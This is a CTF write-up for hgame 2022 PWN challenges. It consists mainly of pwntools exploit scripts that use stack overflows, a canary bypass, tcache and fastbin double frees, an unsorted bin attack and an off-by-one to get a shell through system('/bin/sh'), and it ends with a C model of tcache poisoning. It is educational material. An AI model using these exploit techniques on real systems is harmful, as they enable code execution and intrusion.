hgame 2022 PWN Writeup (selected challenges)

Table of Contents

  • Level - Week1
    • enter_the_pwn_land
    • enter_the_evil_pwn_land
    • test_your_nc
    • test_your_gdb
  • Level - Week2
    • oldfashion_note
  • Level - Week3
    • changeable_note
    • elder_note
    • sized_note

Level - Week1

enter_the_pwn_land

#encoding=utf-8
from pwn import *
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/enter_the_pwn_land/to_give_out/a.out'
r = process(fpath)
#r = remote("chuj.top",31952)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/enter_the_pwn_land/to_give_out/libc-2.31.so")

# first input: the program echoes a libc pointer back, from which the base is recovered
r.sendline(b"a"*0x20)
libc.address = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) + 0x288f6 - 0x25000
print("libc_base:",hex(libc.address))

poprdi = 0x401312 + 1            # pop rdi ; ret   (poprdi+1 is a lone ret, used to realign the stack)
sys_addr = libc.symbols['system']
print("sys_addr:"+hex(sys_addr))
sh_addr = next(libc.search(b"/bin/sh\0"))
print("sh_addr:"+hex(sh_addr))

# Inferred from the payload layout (the writeup does not say): the 0x2d lands on the
# low byte of the 4-byte loop counter at buf+0x2c, so the copy continues at index 0x2e;
# the two NULs finish the counter, p64(0) is the saved rbp, then the ROP chain follows:
# ret (16-byte stack alignment for system) ; pop rdi ; "/bin/sh" ; system
payload = b'a'*0x2c+b'\x2d'+ b'\x00'*2+p64(0)+p64(poprdi+1)+p64(poprdi)+p64(sh_addr)+p64(sys_addr)
r.sendline(payload)
r.interactive()

enter_the_evil_pwn_land

#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/enter_the_evil_pwn_land/to_give_out/a.out_2.31'
#r = process(fpath)
r = remote("chuj.top",38991)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/enter_the_evil_pwn_land/to_give_out/libc-2.31.so")

r.sendline(b"a"*0x20)
libc.address = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) + 0x288f6 - 0x25000
print("libc_base:",hex(libc.address))

# No canary leak is needed: the overflow is long enough (0x868 bytes) to reach the
# master copy of the canary in TLS (fs:0x28), so the same value is written to the
# stack slot and to the TLS copy and the epilogue check passes.
canary = 0x9999999999999900
poprdi = 0x401362 + 1            # pop rdi ; ret (unused once a one_gadget is taken)
sys_addr = libc.symbols['system']
print("sys_addr:"+hex(sys_addr))
sh_addr = next(libc.search(b"/bin/sh\0"))
print("sh_addr:"+hex(sh_addr))
one = [0xe6c7e, 0xe6c81, 0xe6c84]   # one_gadget offsets for this libc-2.31
one_addr = one[1]+libc.address

payload = b'a'*0x28+p64(canary)+p64(0)+p64(one_addr)   # buffer, canary slot, saved rbp, return address
payload = payload.ljust(0x868,b'\0')                   # pad up to the TLS canary
payload += p64(canary)
time.sleep(1)
r.sendline(payload)
r.interactive()

test_your_nc

nc chuj.top 50026
cat flag

test_your_gdb

#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hgame2022/pwn/test_your_gdb/to_give_out/a.out'
r = process(fpath)
#r = remote("chuj.top",50610)
elf = context.binary = ELF(fpath)

# the 16-byte password the binary compares against (the challenge is about reading it out in gdb)
payload=p64(0xb0361e0e8294f147)+p64(0x8c09e0c34ed8a6a9)
r.sendafter('enter your pass word', payload)

# the reply contains the canary: skip one line, 16 bytes and one more 8-byte value
r.recvline()
r.recv(16)
a=u64(r.recv(8))
canary=u64(r.recv(8))
print("canary",hex(canary))

backdoor = 0x401256
payload=b'a'*24 + p64(canary)+p64(0)+p64(backdoor)   # buffer, canary, saved rbp, return address
r.sendline(payload)
r.interactive()

Level - Week2

oldfashion_note

#encoding=utf-8
from pwn import *
import time
import hashlib,string,itertools
context(os='linux',arch='amd64')
context.log_level = 'debug'
#r = remote('chuj.top',51336)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/oldfashion_note/to_give_out/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/oldfashion_note/to_give_out/libc-2.31.so")

def crack_hash(hashcall, res, length, tailer):
    dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"
    for item in itertools.product(dateset, repeat=length):
        tmp = ("".join(item) + tailer).encode()
        htmp = hashcall(tmp).hexdigest()
        if htmp == res:
            print(tmp.decode())
            return tmp.decode()

def Proof_Of_Work():
    r.recvuntil("=== Proof Of Work ===\n")
    ti = r.recvline()[:-1]
    rsha256 = ti.split(b" == ")[1].decode()
    header = crack_hash(hashlib.sha256, rsha256, 4, '')
    r.sendline(header)
#Proof_Of_Work()

def _add(idx, lenn, ddd):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("index?",str(idx))
    r.sendlineafter(">>",str(lenn))
    r.sendlineafter(">>",ddd)
def _edit(idx, ddd):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("Input the index:\n",str(idx))
    #r.sendlineafter(":\n",str(lenn))
    r.sendlineafter(":\n",ddd)
def _remove(idx):
    r.sendlineafter(">> ",'3')
    r.sendlineafter(">>",str(idx))
def _view(idx):
    r.sendlineafter(">> ",'2')
    r.sendlineafter(">>",str(idx))

_add(0,0x90,"0")                  # 0x90 request -> 0xa0 chunk, beyond fastbin range
_add(1,0x90,"1")
for i in range(7):                # fill the 0xa0 tcache bin
    _add(7+i,0x90,"3")
for i in range(7):
    _remove(7+i)
_remove(0)                        # tcache full -> chunk 0 goes to the unsorted bin
_view(0)                          # UAF read: fd of the unsorted chunk = main_arena+96
main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))

malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']
# __malloc_hook shares a page with main_arena, so the page part of the leak plus the
# symbol's in-page offset gives its address
malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))

_add(2,0x60,"1")                  # 0x60 request -> 0x70 chunk
_add(3,0x60,"1")
_add(4,0x60,"1")
for i in range(7):                # fill the 0x70 tcache bin so the next frees go to the fastbin
    _add(7+i,0x60,"3")
for i in range(7):
    _remove(7+i)
_remove(2)
_remove(3)
_remove(2)                        # fastbin double free: 2 -> 3 -> 2 (free() only compares against the bin head)
for i in range(7):                # drain the tcache bin again
    _add(7+i,0x60,"3")
# chunk 2 comes back from the fastbin, the remaining fastbin entries are stashed into
# tcache, and this write sets chunk 2's tcache next pointer to __free_hook (UAF)
_add(3,0x60,p64(free_hook_addr))
_add(4,0x60,'/bin/sh\0')          # chunk 3
_add(5,0x60,'11')                 # chunk 2
_add(6,0x60,p64(system_addr))     # returns __free_hook itself
_remove(4)                        # free("/bin/sh") -> system("/bin/sh")
r.interactive()

Level - Week3

changeable_note

1. Use the heap overflow to make an unsorted-bin chunk overlap fastbin chunks
2. Leak libc through an _IO_FILE leak (a fake chunk inside _IO_2_1_stdout_)
3. Use the heap overflow to take over __free_hook

#encoding=utf-8
from pwn import *
import time
import hashlib,string,itertools
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/changeable_note/note'
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/changeable_note/libc-2.23.so")

def crack_hash(hashcall, res, length, tailer):
    dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"
    for item in itertools.product(dateset, repeat=length):
        tmp = ("".join(item) + tailer).encode()
        htmp = hashcall(tmp).hexdigest()
        if htmp == res:
            print(tmp.decode())
            return tmp.decode()

def Proof_Of_Work():
    r.recvuntil("=== Proof Of Work ===\n")
    ti = r.recvline()[:-1]
    rsha256 = ti.split(b" == ")[1].decode()
    header = crack_hash(hashlib.sha256, rsha256, 4, '')
    r.sendline(header)

def _add(idx, lenn, ddd):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("index?\n>> ",str(idx))
    r.sendlineafter(">> ",str(lenn))
    r.sendafter(">> ",ddd)
def _edit(idx, ddd):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("index?\n>> ",str(idx))
    time.sleep(0.1)
    r.sendline(ddd)
def _remove(idx):
    r.sendlineafter(">> ",'3')
    r.sendlineafter("index?\n>> ",str(idx))
def _view(idx):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("index?\n>> ",str(idx))

def pwn():
    # edit() reads with gets(), which appends a NUL, so edit() cannot be used to write the stdout address
    _add(0,0x60,b"0")                              # 0x70 chunk
    _add(1,0x8,b"1")                               # 0x20 chunk; keeps later allocations from reusing the freed chunk 2
    _add(2,0x8,b"2")                               # 0x20 chunk
    _add(3,0x60,b"3"*0x28+p64(0x41))               # 0x70 chunk with a fake 0x41 size planted inside (0x30+0x40)
    _add(4,0x60,b"4")                              # 0x70 chunk
    _add(5,0x60,b"5")                              # 0x70 chunk
    _remove(3)
    _edit(1, b'0'*0x18+p64(0x51))                  # overflow: chunk 2's size becomes 0x51
    _remove(2)
    _edit(0, b'\0'*0x68+p64(0x20+0x20+0x70+0x71))  # overflow: chunk 1 now spans chunks 1, 2, 3 and 4
    _remove(1)                                     # 0x120 chunk into the unsorted bin, overlapping the fastbin chunks
    _add(1,0x30,b"1")                              # split off the front of the overlapping chunk
    # chunk 2 (0x50 fastbin) overlaps chunk 3's header: restore size 0x71 and set the low bytes of
    # its fd to _IO_2_1_stdout_-0x43 (one 4-bit ASLR guess, hence the retry loop below)
    _add(2,0x40,b'0'*0x18+p64(0x71)+b'\xdd\x85')
    _add(3,0x60,b"1")
    # _flags = 0xfbad3887, read pointers = 0, low byte of _IO_write_base lowered to 0x88
    payload = b'\0'*0x33 + p64(0xfbad3887) + p64(0)*3 + b"\x88"
    _add(6, 0x60, payload)                         # fake chunk inside _IO_2_1_stdout_; the next flush leaks libc pointers
    libc.address = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - libc.sym["_IO_2_1_stdin_"]
    libc.address = abs(libc.address)
    print("libc.address:", hex(libc.address))
    _add(7, 0x100, '7')                            # 0x110 chunks
    _add(8, 0x100, '8')
    _remove(7)                                     # chunk 7 into the unsorted bin
    free_hook_addr = libc.symbols['__free_hook']
    system_addr = libc.symbols['system']
    print("free_hook_addr:", hex(free_hook_addr))
    print("system_addr:", hex(system_addr))
    # overflow from chunk 5 into chunk 7's header: keep size 0x110, bk = __free_hook-29
    _edit(5,b'5'*0x68+p64(0x110)+p64(free_hook_addr-29)+p64(free_hook_addr-29))
    _add(7,0x100,"1")                              # unsorted bin attack: main_arena+88 is written to __free_hook-13, leaving 0x7f at __free_hook-8
    _remove(4)                                     # chunk 4 into the 0x70 fastbin
    print('free_hook_addr:',hex(free_hook_addr))
    _edit(3, b'0'*0x68+p64(0x71)+p64(free_hook_addr-16))   # overflow into chunk 4: fd -> fake chunk at __free_hook-16
    _add(8,0x60,b"/bin/sh")                        # chunk 4
    _add(9,0x60,p64(system_addr))                  # fake chunk: its user data is __free_hook
    _remove(8)                                     # free("/bin/sh") -> system("/bin/sh")
    r.interactive()

# the stdout guess succeeds about 1 time in 16, so retry until it does
while True:
    try:
        r = process(fpath)
        #r = remote("chuj.top",52595)
        #Proof_Of_Work()
        pwn()
        break
    except:
        r.close()

elder_note

1. Fastbin double free to get overlapping chunks, rewrite a chunk header so it lands in the unsorted bin, and leak libc from it
2. Use the unsorted bin attack to write a 0x7f byte just before __free_hook (a fake fastbin size)
3. Fastbin double free again to get a chunk whose user data is __free_hook

#encoding=utf-8
from pwn import *
import time
import hashlib,string,itertools
context(os='linux',arch='amd64')
#r = remote('chuj.top',52603)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/elder_note/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/elder_note/libc-2.23.so")

def crack_hash(hashcall, res, length, tailer):
    dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"
    for item in itertools.product(dateset, repeat=length):
        tmp = ("".join(item) + tailer).encode()
        htmp = hashcall(tmp).hexdigest()
        if htmp == res:
            print(tmp.decode())
            return tmp.decode()

def Proof_Of_Work():
    r.recvuntil("=== Proof Of Work ===\n")
    ti = r.recvline()[:-1]
    rsha256 = ti.split(b" == ")[1].decode()
    header = crack_hash(hashlib.sha256, rsha256, 4, '')
    r.sendline(header)
#Proof_Of_Work()

def _add(idx, lenn, ddd):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("index?",str(idx))
    r.sendlineafter(">>",str(lenn))
    r.sendafter(">>",ddd)
def _edit(idx, ddd):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("Input the index:\n",str(idx))
    #r.sendlineafter(":\n",str(lenn))
    r.sendlineafter(":\n",ddd)
def _remove(idx):
    r.sendlineafter(">> ",'3')
    r.sendlineafter(">>",str(idx))
def _view(idx):
    r.sendlineafter(">> ",'2')
    r.sendlineafter(">>",str(idx))

# 0x70 chunks; each plants a fake 0x71 size at chunk+0x68, i.e. a fake chunk header at chunk+0x60
# (the one in chunk 1 keeps the next-size check happy when the fake chunk is freed later)
_add(0,0x60,b"1"*0x58+p64(0x71))
_add(1,0x60,b"1"*0x58+p64(0x71))
_add(2,0x50,"1")                  # 0x60 chunk
_add(3,0x60,"1")                  # 0x70 chunk
_remove(0)
_remove(1)
_remove(0)                        # fastbin double free: 0 -> 1 -> 0 (free() only compares against the bin head)
_add(0,0x60,b"\x60")              # chunk 0 again; the low byte of its fd now points at the fake chunk at heap+0x60
_add(1,0x60,"0")                  # chunk 1
_add(4,0x60,"0")                  # chunk 0 a second time (index 4 == index 0)
_add(5,0x60,p64(0)+p64(0xd1))     # fake chunk: its user data is chunk 1's header, size becomes 0xd1 (covers chunks 1 and 2)
_remove(1)                        # 0xd0 is too big for a fastbin: chunk 1 goes to the unsorted bin
_view(1)                          # fd of the unsorted chunk = main_arena+88 in libc-2.23 (variable name kept from the 2.31 scripts)
main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))

malloc_hook_s = libc.symbols['__malloc_hook']
malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)   # __malloc_hook shares a page with main_arena
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base +libc.symbols['__free_hook']
system_addr = libc_base + libc.sym['system']
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))

_remove(5)                        # fake chunk back into the 0x70 fastbin
# chunk 1's header again: size back to 0x71, bk = __free_hook-29 (unsorted bin attack target)
_add(5,0x60,p64(0)+p64(0x71)+p64(free_hook_addr-29)+p64(free_hook_addr-29))
# exact fit from the unsorted bin: bck->fd = main_arena+88 is written to __free_hook-13,
# which leaves a 0x7f byte at __free_hook-8
_add(1,0x60,"1")
_remove(0)
_remove(1)
_remove(0)                        # second fastbin double free
_add(0,0x60,p64(free_hook_addr-16))   # fd -> fake chunk at __free_hook-16 (its size field is the 0x7f just written)
_add(1,0x60,"/bin/sh")
_add(6,0x60,"4")
_add(7,0x60,p64(system_addr))     # fake chunk: its user data is __free_hook
_remove(1)                        # free("/bin/sh") -> system("/bin/sh")
r.interactive()

sized_note

Off-by-one: edit() writes one NUL byte past the end of the note, into the next chunk's size field, which is used to fake a large prev_size and trigger backward consolidation.

#encoding=utf-8
from pwn import *
import time
import hashlib,string,itertools
context(os='linux',arch='amd64')
#r = remote('chuj.top',52919)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/sized_note/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/sized_note/libc.so.6")

def crack_hash(hashcall, res, length, tailer):
    dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"
    for item in itertools.product(dateset, repeat=length):
        tmp = ("".join(item) + tailer).encode()
        htmp = hashcall(tmp).hexdigest()
        if htmp == res:
            print(tmp.decode())
            return tmp.decode()

def Proof_Of_Work():
    r.recvuntil("=== Proof Of Work ===\n")
    ti = r.recvline()[:-1]
    rsha256 = ti.split(b" == ")[1].decode()
    header = crack_hash(hashlib.sha256, rsha256, 4, '')
    r.sendline(header)
#Proof_Of_Work()

def _add(idx, lenn, ddd):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("index?\n>> ",str(idx))
    r.sendlineafter(">> ",str(lenn))
    r.sendafter(">> ",ddd)
def _edit(idx, ddd):
    r.sendlineafter(">> ",'4')
    r.sendlineafter("index?\n>> ",str(idx))
    time.sleep(0.1)
    r.sendline(ddd)
def _del(idx):
    r.sendlineafter(">> ",'3')
    r.sendlineafter("index?\n>> ",str(idx))
def _view(idx):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("index?\n>> ",str(idx))

_add(0, 0xf8, '0')                # 0xf8 request -> 0x100 chunk
_add(1, 0xf8, '1')
_add(2, 0xf8, '2')
_add(3, 0xf8, '3')
_add(4, 0xf8, '4')
_add(5, 0x20, '/bin/sh\0 3')      # 0x30 chunk
for i in range(7):                # fill the 0x100 tcache bin
    _add(7+i, 0xf8, '2')
for i in range(7):
    _del(7+i)
_del(0)                           # tcache full -> chunk 0 goes to the unsorted bin
# fills chunk 1 exactly: chunk 2's prev_size becomes 0x200 and the off-by-one NUL clears
# the low byte of chunk 2's size (PREV_INUSE)
_edit(1,b'a'*0xf0 + p64(0x200))
_del(2)                           # backward consolidation over chunks 1 and 0: one 0x300 unsorted chunk, index 1 still points into it
for i in range(7):                # drain the tcache bin
    _add(7+i, 0xf8, '2')
_add(0, 0xf8, '0')                # split 0x100 off the front; the remainder starts at chunk 1
_view(1)                          # UAF read: fd of the remainder = main_arena+96
main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))

malloc_hook_s = libc.symbols['__malloc_hook']
malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)   # __malloc_hook shares a page with main_arena
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base +libc.symbols['__free_hook']
system_addr = libc_base + libc.sym['system']
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))

_add(5, 0x20, '5')                # carved from the remainder: index 5 and index 1 now point to the same address
_del(5)                           # into the 0x30 tcache bin; index 1 is now dangling (UAF)
_edit(1, p64(free_hook_addr))     # overwrite the tcache next pointer
_add(6,0x20, '/bin/sh\0 #6')      # gets the chunk back
_add(7,0x20, p64(system_addr))    # gets __free_hook
_del(6)                           # free("/bin/sh") -> system("/bin/sh"); either 3 or 6 works
r.interactive()
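oldfashion_note and sized_note rely on the same primitive: a freed chunk's first eight bytes are the bin's next pointer, so once a freed chunk can still be written (double free in the first case, two indexes aliasing one chunk in the second) the attacker picks what malloc() returns next. The C program below is an added example, not code from the writeup. It is a toy allocator that mirrors the tcache behaviour that matters here (next at +0, key at +8, no validation of the link on the way out) and replays both exploits against it, plus the glibc 2.29+ double-free key check, which is the reason oldfashion_note fills tcache first and does its double free in a fastbin. The pool, the fake __free_hook slot and the values written into it are constructed; nothing here is the real glibc code.

```c
/* Added example (not code from the writeup): a toy freelist modelling glibc's
 * tcache closely enough to show the primitive shared by oldfashion_note and
 * sized_note. A freed chunk's first 8 bytes become the bin's `next` link, so a
 * dangling pointer (double free or UAF) lets the attacker choose what malloc()
 * returns next. toy_free_checked() adds the 2.29+ `key` check, which is why
 * oldfashion_note (libc 2.31) fills tcache and double-frees in a fastbin instead.
 * Addresses and values are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CHUNK_WORDS (0x70 / 8)
#define POOL_CHUNKS 8
#define KEY_OF(chunk) ((char *)(chunk) + 8)      /* glibc tcache_entry: next at +0, key at +8 */

struct toy_tcache { void *head; int count; };

static uint64_t pool[POOL_CHUNKS][CHUNK_WORDS];  /* the heap; 8-byte aligned like real chunks */
static size_t pool_next;
static struct toy_tcache tc;
static uint64_t fake_free_hook[2];               /* [0] stands in for __free_hook */

static void *load_ptr(const void *p) { void *v; memcpy(&v, p, sizeof v); return v; }
static void store_ptr(void *p, const void *v) { memcpy(p, &v, sizeof v); }

static void reset(void) {
    memset(pool, 0, sizeof pool); pool_next = 0;
    tc.head = NULL; tc.count = 0;
    fake_free_hook[0] = fake_free_hook[1] = 0;
}

/* malloc(): pop the bin head if there is one (2.27 style: no count check, no
 * pointer checks), otherwise carve a fresh chunk from the pool (the "top chunk"). */
static void *toy_malloc(void) {
    if (tc.head) {
        void *e = tc.head;
        tc.head = load_ptr(e);                   /* follow e->next, unverified */
        store_ptr(KEY_OF(e), NULL);              /* 2.29+ clears key on the way out */
        tc.count--;
        return e;
    }
    return pool_next < POOL_CHUNKS ? (void *)pool[pool_next++] : NULL;
}

/* free(), 2.27 style: push; the old head lands in the chunk's first 8 bytes */
static void toy_free_unchecked(void *p) {
    store_ptr(p, tc.head);                       /* e->next = old head */
    store_ptr(KEY_OF(p), &tc);                   /* e->key  = tcache   */
    tc.head = p;
    tc.count++;
}

/* free(), 2.29+ style: a chunk whose key already marks it as ours is looked for
 * in the bin; finding it is "free(): double free detected in tcache 2".
 * Returns 0 where glibc would abort. */
static int toy_free_checked(void *p) {
    if (load_ptr(KEY_OF(p)) == (void *)&tc)
        for (void *t = tc.head; t; t = load_ptr(t))
            if (t == p) return 0;
    toy_free_unchecked(p);
    return 1;
}

/* oldfashion_note: free 2, free 3, free 2 -> bin 2 -> 3 -> 2. The first malloc()
 * hands back chunk 2 while it is still the third bin entry, so the note content
 * written into it is also that entry's next pointer. */
static int double_free_poison(void) {
    reset();
    void *c2 = toy_malloc(), *c3 = toy_malloc();
    toy_free_unchecked(c2); toy_free_unchecked(c3); toy_free_unchecked(c2);
    void *note = toy_malloc();                   /* chunk 2 */
    store_ptr(note, fake_free_hook);             /* add(3, p64(__free_hook)) in the writeup */
    void *binsh = toy_malloc();                  /* chunk 3: add(4, "/bin/sh") */
    toy_malloc();                                /* chunk 2 again: add(5, "11") */
    uint64_t *hook = toy_malloc();               /* add(6, p64(system)) lands on __free_hook */
    *hook = 0x5bad0000;                          /* stands in for the address of system() */
    return note == c2 && binsh == c3 && hook == fake_free_hook && fake_free_hook[0] == 0x5bad0000;
}

/* sized_note: two indexes alias one chunk; del(5) frees it, edit(1) writes
 * through the stale pointer. No double free, so the 2.29+ key check stays quiet. */
static int uaf_poison(void) {
    reset();
    void *note1 = toy_malloc();
    void *note5 = note1;                         /* index 5 carved at index 1's address */
    if (!toy_free_checked(note5)) return 0;      /* del(5) */
    store_ptr(note1, fake_free_hook);            /* edit(1, p64(__free_hook)) */
    toy_malloc();                                /* add(6, "/bin/sh") gets the chunk back */
    uint64_t *hook = toy_malloc();               /* add(7, p64(system)) gets __free_hook */
    *hook = 0x5bad0000;
    return hook == fake_free_hook && fake_free_hook[0] == 0x5bad0000;
}

/* The same double free against the checked free(): refused. A fastbin free()
 * only compares the chunk with the bin head, hence the 7 tcache-filling frees. */
static int double_free_detected(void) {
    reset();
    void *c = toy_malloc();
    return toy_free_checked(c) == 1 && toy_free_checked(c) == 0;
}

int main(void) {
    printf("tcache double free poison : %s\n", double_free_poison()   ? "__free_hook handed out" : "failed");
    printf("tcache UAF poison         : %s\n", uaf_poison()           ? "__free_hook handed out" : "failed");
    printf("2.29+ key check           : %s\n", double_free_detected() ? "double free refused"    : "not detected");
    return 0;
}
```

The allocator never validates the link it follows, which is the whole story: in the sized_note case a single 8-byte edit after the free is enough, and in the oldfashion_note case the libc 2.31 key check forces the detour through a fastbin, after which the stash into tcache carries the poisoned link along. The safe-linking mangling added in glibc 2.32 (next XORed with the chunk address >> 12) is what finally makes the plain pointer write in both scripts fail.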
